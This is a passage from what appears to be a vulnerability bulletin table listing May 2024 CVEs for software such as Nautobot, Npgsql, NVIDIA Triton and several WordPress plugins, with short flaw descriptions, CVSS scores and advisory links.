<td>Nautobot is a Network Source of Truth and Network Automation Platform. A Nautobot user with admin privileges can modify the `BANNER_TOP`, `BANNER_BOTTOM`, and `BANNER_LOGIN` configuration settings via the `/admin/constance/config/` endpoint. Normally these settings are used to provide custom banner text at the top and bottom of all Nautobot web pages (or specifically on the login page in the case of `BANNER_LOGIN`) but it was reported that an admin user can make use of these settings to inject arbitrary HTML, potentially exposing Nautobot users to security issues such as cross-site scripting (stored XSS). The vulnerability is fixed in Nautobot 1.6.22 and 2.2.4.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34707&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:H/A:L" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34707" target="_blank">CVE-2024-34707</a><br><a href="https://github.com/nautobot/nautobot/commit/4f0a66bd6307bfe0e0acb899233e0d4ad516f51c" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/nautobot/nautobot/commit/f640aedc69c848d3d1be57f0300fc40033ff6423" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/nautobot/nautobot/pull/5697" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/nautobot/nautobot/pull/5698" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/nautobot/nautobot/security/advisories/GHSA-r2hr-4v48-fjv3" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>nocodb--nocodb<br> </td>
<td>NocoDB is software for building databases as spreadsheets. Prior to 0.202.9, a stored cross-site scripting vulnerability exists within the Formula virtual cell comments functionality. The nc-gui/components/virtual-cell/Formula.vue displays a v-html tag with the value of "urls" whose contents are processed by the function replaceUrlsWithLink(). This function recognizes the pattern URI::(XXX) and creates a hyperlink tag &lt;a&gt; with href=XXX. However, it leaves all the other contents outside of the pattern URI::(XXX) unchanged. This vulnerability is fixed in 0.202.9.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-49781&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N" target="_blank" title="CVSS V3 Score">7.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-49781" target="_blank">CVE-2023-49781</a><br><a href="https://github.com/nocodb/nocodb/commit/7f58ce3726dfec71537d8b80474a0f95a48a1574" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/nocodb/nocodb/security/advisories/GHSA-h6r4-xvw6-jc5h" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>npgsql--npgsql<br> </td>
<td>Npgsql is the .NET data provider for PostgreSQL. The `WriteBind()` method in `src/Npgsql/Internal/NpgsqlConnector.FrontendMessages.cs` uses `int` variables to store the message length and the sum of parameter lengths. Both variables overflow when the sum of parameter lengths becomes too large. This causes Npgsql to write a message size that is too small when constructing a Postgres protocol message to send it over the network to the database. When parsing the message, the database will only read a small number of bytes and treat any following bytes as new messages while they belong to the old message. Attackers can abuse this to inject arbitrary Postgres protocol messages into the connection, leading to the execution of arbitrary SQL statements on the application's behalf. This vulnerability is fixed in 4.0.14, 4.1.13, 5.0.18, 6.0.11, 7.0.7, and 8.0.3.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32655&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32655" target="_blank">CVE-2024-32655</a><br><a href="https://github.com/npgsql/npgsql/commit/091655eed0c84e502ab424950c930339d17c1928" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/npgsql/npgsql/commit/3183efb2bdcca159c8c2e22af57e18ea8f853cf0" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/npgsql/npgsql/commit/67acbe027e28477ac2199e15cfb554bb2ffaf169" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/npgsql/npgsql/commit/703d9af8fa48dfe8c0180e36edb8278f34342d7b" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/npgsql/npgsql/commit/a22a42d8141d7a3528f43c02c095a409507cf1af" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/npgsql/npgsql/commit/e34e2ba8042e666d9af54a1b255fba4d5b11df56" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/npgsql/npgsql/commit/f7e7ead0702d776a8f551f5786c4cac2d65c4bc6" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/npgsql/npgsql/releases/tag/v4.0.14" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/npgsql/npgsql/releases/tag/v4.1.13" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/npgsql/npgsql/releases/tag/v5.0.18" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/npgsql/npgsql/releases/tag/v6.0.11" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/npgsql/npgsql/releases/tag/v7.0.7" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/npgsql/npgsql/releases/tag/v8.0.3" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/npgsql/npgsql/security/advisories/GHSA-x9vc-6hfv-hg8c" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>nvidia--ChatRTX<br> </td>
<td>NVIDIA ChatRTX for Windows contains a vulnerability in Chat RTX UI, where a user can cause an improper privilege management issue by sending user inputs to change execution flow. A successful exploit of this vulnerability might lead to information disclosure, escalation of privileges, and data tampering.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-0096&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-0096" target="_blank">CVE-2024-0096</a><br><a href="https://nvidia.custhelp.com/app/answers/detail/a_id/5533" target="_blank">psirt@nvidia.com</a></td>
</tr>
<tr>
<td>nvidia--ChatRTX<br> </td>
<td>NVIDIA ChatRTX for Windows contains a vulnerability in ChatRTX UI, where a user can cause an improper privilege management issue by exploiting interprocess communication between different processes. A successful exploit of this vulnerability might lead to information disclosure, escalation of privileges, and data tampering.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-0097&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-0097" target="_blank">CVE-2024-0097</a><br><a href="https://nvidia.custhelp.com/app/answers/detail/a_id/5533" target="_blank">psirt@nvidia.com</a></td>
</tr>
<tr>
<td>nvidia--NVIDIA Triton Inference Server<br> </td>
<td>NVIDIA Triton Inference Server for Linux contains a vulnerability where a user can set the logging location to an arbitrary file. If this file exists, logs are appended to the file. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-0087&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:H" target="_blank" title="CVSS V3 Score">9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-0087" target="_blank">CVE-2024-0087</a><br><a href="https://nvidia.custhelp.com/app/answers/detail/a_id/5535" target="_blank">psirt@nvidia.com</a></td>
</tr>
<tr>
<td>pencidesign--Penci Soledad Data Migrator<br> </td>
<td>The Penci Soledad Data Migrator plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.3.0 via the 'data' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other "safe" file types can be uploaded and included. This is limited to just PHP files.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3551&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3551" target="_blank">CVE-2024-3551</a><br><a href="https://themeforest.net/item/soledad-multiconcept-blogmagazine-wp-theme/12945398" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a4f8df3a-f247-4365-a9f6-6124065b4883?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>plainware--ShiftController Employee Shift Scheduling<br> </td>
<td>The ShiftController Employee Shift Scheduling plugin is vulnerable to PHP Object Injection via deserialization of untrusted input via the `hc3_session`-cookie in versions up to, and including, 4.9.57. This makes it possible for an authenticated attacker with contributor access-level or above to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4733&amp;vector=CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4733" target="_blank">CVE-2024-4733</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;new=3087047%40shiftcontroller%2Ftrunk&amp;old=3080165%40shiftcontroller%2Ftrunk&amp;sfp_email=&amp;sfph_mail=" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9c8ab916-240d-43c3-92d4-7efd75862a5e?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>plugins360--All-in-One Video Gallery<br> </td>
<td>The All-in-One Video Gallery plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.6.5 via the aiovg_search_form shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other "safe" file types can be uploaded and included.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4670&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4670" target="_blank">CVE-2024-4670</a><br><a href="https://plugins.trac.wordpress.org/changeset/3085217/all-in-one-video-gallery" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e2793547-5edf-4d2a-bc3b-fcaeed62963d?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>powerfulwp--Local Delivery Drivers for WooCommerce<br> </td>
<td>Improper Privilege Management vulnerability in powerfulwp Local Delivery Drivers for WooCommerce allows Privilege Escalation.This issue affects Local Delivery Drivers for WooCommerce: from n/a through 1.9.0.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-51481&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-51481" target="_blank">CVE-2023-51481</a><br><a href="https://patchstack.com/database/vulnerability/local-delivery-drivers-for-woocommerce/wordpress-local-delivery-drivers-for-woocommerce-plugin-1-9-0-unauthenticated-account-takeover-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>ravanh--XML Sitemap &amp; Google News<br> </td>
<td>The XML Sitemap &amp; Google News plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 5.4.8 via the 'feed' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other "safe" file types can be uploaded and included.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4441&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4441" target="_blank">CVE-2024-4441</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;old=3082081%40xml-sitemap-feed&amp;new=3082081%40xml-sitemap-feed&amp;sfp_email=&amp;sfph_mail=" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/87888350-1230-4fec-9de2-c58fa24e6a05?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>smp7, wp.insider--Simple Membership<br> </td>
<td>Improper Authentication vulnerability in smp7, wp.Insider Simple Membership.This issue affects Simple Membership: from n/a through 4.3.4.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-41956&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-41956" target="_blank">CVE-2023-41956</a><br><a href="https://patchstack.com/database/vulnerability/simple-membership/wordpress-simple-membership-plugin-4-3-4-authenticated-account-takeover-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>smp7, wp.insider--Simple Membership<br> </td>
<td>Improper Privilege Management vulnerability in smp7, wp.Insider Simple Membership allows Privilege Escalation.This issue affects Simple Membership: from n/a through 4.3.4.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-41957&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L" target="_blank" title="CVSS V3 Score">8.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-41957" target="_blank">CVE-2023-41957</a><br><a href="https://patchstack.com/database/vulnerability/simple-membership/wordpress-simple-membership-plugin-4-3-4-unauthenticated-membership-role-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>spacemeshos--go-spacemesh<br> </td>
<td>go-spacemesh is a Go implementation of the Spacemesh protocol full node. Nodes can publish activations transactions (ATXs) which reference the incorrect previous ATX of the Smesher that created the ATX. ATXs are expected to form a single chain from the newest to the first ATX ever published by an identity. Allowing Smeshers to reference an earlier (but not the latest) ATX as previous breaks this protocol rule and can serve as an attack vector where Nodes are rewarded for holding their PoST data for less than one epoch but still being eligible for rewards. This vulnerability is fixed in go-spacemesh 1.5.2-hotfix1 and Spacemesh API 1.37.1.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34360&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" target="_blank" title="CVSS V3 Score">8.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34360" target="_blank">CVE-2024-34360</a><br><a href="https://github.com/spacemeshos/api/commit/1d5bd972bbe225d024c3e0ae5214ddb6b481716e" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/spacemeshos/go-spacemesh/commit/9aff88d54be809ac43d60e8a8b4d65359c356b87" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/spacemeshos/go-spacemesh/security/advisories/GHSA-jcqq-g64v-gcm7" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>spoonthemes--Adifier System<br> </td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in spoonthemes Adifier System allows PHP Local File Inclusion.This issue affects Adifier System: from n/a before 3.1.4.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-49753&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-49753" target="_blank">CVE-2023-49753</a><br><a href="https://patchstack.com/database/vulnerability/adifier-system/wordpress-adifier-classified-ads-wordpress-theme-theme-3-9-3-local-file-inclusion-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>stalwartlabs--mail-server<br> </td>
<td>Stalwart Mail Server is an open-source mail server. Prior to version 0.8.0, attackers who achieved Arbitrary Code Execution as the stalwart-mail user (including web interface admins) can gain complete root access to the system. Usually, system services are run as a separate user (not as root) to isolate an attacker with Arbitrary Code Execution to the current service. Therefore, other system services and the system itself remains protected in case of a successful attack. stalwart-mail runs as a separate user, but it can give itself full privileges again in a simple way, so this protection is practically ineffective. Server admins who handed out the admin credentials to the mail server, but didn't want to hand out complete root access to the system, as well as any attacked user when the attackers gained Arbitrary Code Execution using another vulnerability, may be vulnerable. Version 0.8.0 contains a patch for the issue.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-35187&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35187" target="_blank">CVE-2024-35187</a><br><a href="https://github.com/stalwartlabs/mail-server/security/advisories/GHSA-rwp5-f854-ppg6" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>strongSwan--strongSwan<br> </td>
<td>strongSwan versions 5.9.2 through 5.9.5 are affected by authorization bypass through improper validation of certificate with host mismatch (CWE-297). When certificates are used to authenticate clients in TLS-based EAP methods, the IKE or EAP identity supplied by a client is not enforced to be contained in the client's certificate. So clients can authenticate with any trusted certificate and claim an arbitrary IKE/EAP identity as their own. This is problematic if the identity is used to make policy decisions. A fix was released in strongSwan version 5.9.6 in August 2022 (e4b4aabc4996fc61c37deab7858d07bc4d220136).</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2022-4967&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">7.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2022-4967" target="_blank">CVE-2022-4967</a><br><a href="https://github.com/strongswan/strongswan/commit/e4b4aabc4996fc61c37deab7858d07bc4d220136" target="_blank">security@ubuntu.com</a><br><a href="https://www.cve.org/CVERecord?id=CVE-2022-4967" target="_blank">security@ubuntu.com</a><br><a href="https://www.strongswan.org/blog/2024/05/13/strongswan-vulnerability-(cve-2022-4967).html" target="_blank">security@ubuntu.com</a></td>
</tr>
<tr>
<td>supsystic.com--Popup by Supsystic<br> </td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in supsystic.Com Popup by Supsystic allows Relative Path Traversal.This issue affects Popup by Supsystic: from n/a through 1.10.19.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-46197&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-46197" target="_blank">CVE-2023-46197</a><br><a href="https://patchstack.com/database/vulnerability/popup-by-supsystic/wordpress-popup-by-supsystic-plugin-1-10-19-unauthenticated-subscriber-email-addresses-disclosure?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>techjewel--Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag &amp; Drop WP Form Builder<br> </td>
<td>The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag &amp; Drop WP Form Builder plugin for WordPress is vulnerable to privilege escalation due to a missing capability check on the /wp-json/fluentform/v1/managers REST API endpoint in all versions up to, and including, 5.1.16. This makes it possible for unauthenticated attackers to grant users with Fluent Form management permissions which gives them access to all of the plugin's settings and features. This also makes it possible for unauthenticated attackers to delete manager accounts.</td>
<td>2024-05-18</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-2771&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-2771" target="_blank">CVE-2024-2771</a><br><a href="https://plugins.trac.wordpress.org/changeset/3088078/fluentform/trunk/app/Http/Policies/RoleManagerPolicy.php" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/071195d6-3452-4241-a8d3-92efc84e4850?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>techjewel--Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag &amp; Drop WP Form Builder<br> </td>
<td>The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag &amp; Drop WP Form Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the /wp-json/fluentform/v1/global-settings REST API endpoint in all versions up to, and including, 5.1.16. This makes it possible for unauthenticated attackers to modify all of the plugin's settings.</td>
<td>2024-05-18</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-2782&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-2782" target="_blank">CVE-2024-2782</a><br><a href="https://plugins.trac.wordpress.org/changeset/3088078/fluentform/trunk/app/Http/Policies/GlobalSettingsPolicy.php" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0814e7b3-404a-4db5-b564-46c9086ec048?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>techjewel--Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag &amp; Drop WP Form Builder<br> </td>
<td>The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag &amp; Drop WP Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'subject' parameter in versions up to, and including, 5.1.16 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, and access granted by an administrator, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-18</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4709&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">7.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4709" target="_blank">CVE-2024-4709</a><br><a href="https://plugins.trac.wordpress.org/browser/fluentform/trunk/app/Services/FormBuilder/Notifications/EmailNotification.php#L106" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/fluentform/trunk/app/Services/FormBuilder/Notifications/EmailNotification.php#L164" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/fluentform/trunk/app/Services/FormBuilder/Notifications/EmailNotification.php#L194" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3088078/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5fe317a6-a391-441a-aac8-c8fa57e73169?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>themeisle--Visualizer: Tables and Charts Manager for WordPress<br> </td>
<td>The Visualizer: Tables and Charts Manager for WordPress plugin for WordPress is vulnerable to unauthorized modification and retrieval of data due to a missing capability check on the getQueryData() function in all versions up to, and including, 3.10.15. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform arbitrary SQL queries that can be leveraged for privilege escalation among many other actions.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3750&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3750" target="_blank">CVE-2024-3750</a><br><a href="https://plugins.trac.wordpress.org/browser/visualizer/trunk/classes/Visualizer/Module/Chart.php#L1421" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3086048/visualizer/tags/3.11.0/classes/Visualizer/Module/Chart.php" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3086048/visualizer/tags/3.11.0/classes/Visualizer/Source/Query.php" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6d27544c-97a5-42cd-ab07-358f819acbc4?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>themeum--Tutor LMS eLearning and online course solution<br> </td>
<td>The Tutor LMS plugin for WordPress is vulnerable to unauthorized access of data, modification of data, loss of data due to a missing capability check on multiple functions in all versions up to, and including, 2.7.0. This makes it possible for unauthenticated attackers to add, modify, or delete data.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4223&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4223" target="_blank">CVE-2024-4223</a><br><a href="https://plugins.trac.wordpress.org/changeset/3086489/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ce4c4395-6d1a-4d5f-885f-383e5c44c0f8?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>themeum--Tutor LMS eLearning and online course solution<br> </td>
<td>The Tutor LMS plugin for WordPress is vulnerable to time-based SQL Injection via the 'question_id' parameter in versions up to, and including, 2.7.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Instructor-level permissions and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4318&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4318" target="_blank">CVE-2024-4318</a><br><a href="https://plugins.trac.wordpress.org/browser/tutor/tags/2.7.0/classes/Utils.php#L4456" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/tutor/tags/2.7.0/classes/Utils.php#L4575" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3086489/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9bbb3c65-f02c-4d6d-bd4e-b3232af5e21b?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>themium--Tutor LMS Pro<br> </td>
<td>The Tutor LMS Pro plugin for WordPress is vulnerable to unauthorized access of data, modification of data, loss of data due to a missing capability check on the 'authenticate' function in all versions up to, and including, 2.7.0. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to gain control of an existing administrator account.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4351&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4351" target="_blank">CVE-2024-4351</a><br><a href="https://www.themeum.com/product/tutor-lms/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/59859583-49e5-4a80-8659-b9ca7ddc089d?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>themium--Tutor LMS Pro<br> </td>
<td>The Tutor LMS Pro plugin for WordPress is vulnerable to unauthorized access of data, modification of data, loss of data due to a missing capability check on the 'get_calendar_materials' function. The plugin is also vulnerable to SQL Injection via the 'year' parameter of that function due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.</td>
<td>2024-05-16</td>
